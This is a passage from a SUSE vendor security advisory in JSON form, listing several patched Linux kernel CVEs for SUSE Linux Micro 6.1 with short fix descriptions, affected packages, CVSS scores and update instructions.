"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40337"
},
{
"cve": "CVE-2025-40338",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40338"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: Intel: avs: Do not share the name pointer between components\n\nBy sharing \u0027name\u0027 directly, tearing down components may lead to\nuse-after-free errors. Duplicate the name to avoid that.\n\nAt the same time, update the order of operations - since commit\ncee28113db17 (\"ASoC: dmaengine_pcm: Allow passing component name via\nconfig\") the framework does not override component-\u003ename if set before\ninvoking the initializer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40338",
"url": "https://www.suse.com/security/cve/CVE-2025-40338"
},
{
"category": "external",
"summary": "SUSE Bug 1255273 for CVE-2025-40338",
"url": "https://bugzilla.suse.com/1255273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40338"
},
{
"cve": "CVE-2025-40339",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40339"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix nullptr err of vm_handle_moved\n\nIf a amdgpu_bo_va is fpriv-\u003eprt_va, the bo of this one is always NULL.\nSo, such kind of amdgpu_bo_va should be updated separately before\namdgpu_vm_handle_moved.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40339",
"url": "https://www.suse.com/security/cve/CVE-2025-40339"
},
{
"category": "external",
"summary": "SUSE Bug 1255428 for CVE-2025-40339",
"url": "https://bugzilla.suse.com/1255428"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40339"
},
{
"cve": "CVE-2025-40342",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40342"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-fc: use lock accessing port_state and rport state\n\nnvme_fc_unregister_remote removes the remote port on a lport object at\nany point in time when there is no active association. This races with\nwith the reconnect logic, because nvme_fc_create_association is not\ntaking a lock to check the port_state and atomically increase the\nactive count on the rport.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40342",
"url": "https://www.suse.com/security/cve/CVE-2025-40342"
},
{
"category": "external",
"summary": "SUSE Bug 1255274 for CVE-2025-40342",
"url": "https://bugzilla.suse.com/1255274"
},
{
"category": "external",
"summary": "SUSE Bug 1255275 for CVE-2025-40342",
"url": "https://bugzilla.suse.com/1255275"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40342"
},
{
"cve": "CVE-2025-40343",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40343"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-fc: avoid scheduling association deletion twice\n\nWhen forcefully shutting down a port via the configfs interface,\nnvmet_port_subsys_drop_link() first calls nvmet_port_del_ctrls() and\nthen nvmet_disable_port(). Both functions will eventually schedule all\nremaining associations for deletion.\n\nThe current implementation checks whether an association is about to be\nremoved, but only after the work item has already been scheduled. As a\nresult, it is possible for the first scheduled work item to free all\nresources, and then for the same work item to be scheduled again for\ndeletion.\n\nBecause the association list is an RCU list, it is not possible to take\na lock and remove the list entry directly, so it cannot be looked up\nagain. Instead, a flag (terminating) must be used to determine whether\nthe association is already in the process of being deleted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40343",
"url": "https://www.suse.com/security/cve/CVE-2025-40343"
},
{
"category": "external",
"summary": "SUSE Bug 1255276 for CVE-2025-40343",
"url": "https://bugzilla.suse.com/1255276"
},
{
"category": "external",
"summary": "SUSE Bug 1255278 for CVE-2025-40343",
"url": "https://bugzilla.suse.com/1255278"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40343"
},
{
"cve": "CVE-2025-40345",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40345"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: storage: sddr55: Reject out-of-bound new_pba\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nnew_pba comes from the status packet returned after each write.\nA bogus device could report values beyond the block count derived\nfrom info-\u003ecapacity, letting the driver walk off the end of\npba_to_lba[] and corrupt heap memory.\n\nReject PBAs that exceed the computed block count and fail the\ntransfer so we avoid touching out-of-range mapping entries.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40345",
"url": "https://www.suse.com/security/cve/CVE-2025-40345"
},
{
"category": "external",
"summary": "SUSE Bug 1255279 for CVE-2025-40345",
"url": "https://bugzilla.suse.com/1255279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40345"
},
{
"cve": "CVE-2025-40346",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40346"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narch_topology: Fix incorrect error check in topology_parse_cpu_capacity()\n\nFix incorrect use of PTR_ERR_OR_ZERO() in topology_parse_cpu_capacity()\nwhich causes the code to proceed with NULL clock pointers. The current\nlogic uses !PTR_ERR_OR_ZERO(cpu_clk) which evaluates to true for both\nvalid pointers and NULL, leading to potential NULL pointer dereference\nin clk_get_rate().\n\nPer include/linux/err.h documentation, PTR_ERR_OR_ZERO(ptr) returns:\n\"The error code within @ptr if it is an error pointer; 0 otherwise.\"\n\nThis means PTR_ERR_OR_ZERO() returns 0 for both valid pointers AND NULL\npointers. Therefore !PTR_ERR_OR_ZERO(cpu_clk) evaluates to true (proceed)\nwhen cpu_clk is either valid or NULL, causing clk_get_rate(NULL) to be\ncalled when of_clk_get() returns NULL.\n\nReplace with !IS_ERR_OR_NULL(cpu_clk) which only proceeds for valid\npointers, preventing potential NULL pointer dereference in clk_get_rate().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
